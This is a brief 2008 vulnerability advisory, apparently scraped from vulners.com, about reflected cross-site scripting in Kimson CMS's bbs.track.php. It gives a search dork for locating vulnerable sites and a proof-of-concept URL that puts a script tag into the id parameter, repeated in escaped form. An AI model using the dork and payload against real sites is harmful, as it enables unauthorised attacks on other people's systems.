Kimson cms cross site scripting vulnerability

2008-11-1900:00:00

vulners.com

             ########################################################################
         #                                                                      #
         #  .:::::Kimson Cross Site Scriptting Vulnerbility ::::.      #           
         ########################################################################

Discoverd By : md.r00t

special tnx to: Hadihadi(Virangar Security Team)
& all virangar members & all hackerz & Hiva Digital Security Team

D0rk: inurl:bbs.track.php?id=

xss:
http://site.com/[patch]/bbs.track.php?id=<script>alert(/0/)</script>

Contact: [email protected]

JSON

Kimson cms cross site scripting vulnerability

D0rk: inurl:bbs.track.php?id=

xss: http://site.com/[patch]/bbs.track.php?id=&lt;script&gt;alert&#40;/0/&#41;&lt;/script&gt;

xss:
http://site.com/[patch]/bbs.track.php?id=<script>alert(/0/)</script>